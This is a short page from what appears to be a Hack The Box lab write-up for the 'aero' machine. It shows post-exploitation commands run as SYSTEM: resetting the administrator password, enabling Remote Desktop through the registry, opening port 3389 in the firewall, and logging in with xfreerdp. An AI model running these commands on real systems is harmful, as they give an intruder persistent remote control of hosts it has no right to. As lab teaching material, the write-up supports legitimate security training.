Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system.
ps c:\Users\sam.emerson\Documents> net user administrator Qwer1234
The command completed successfully.password reset for the administrator user
ps c:\Users\sam.emerson\Documents> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
ps c:\Users\sam.emerson\Documents> netsh firewall add portopening TCP 3389 "Remote Desktop"
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.RDP enabled
┌──(kali㉿kali)-[~/archive/htb/labs/aero]
└─$ xfreerdp /u:administrator /p:Qwer1234 /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0 
RDP
Version
10.0.22000.1761
Scheduled Tasks
\AeroHub Startup
Aero.exe is the web app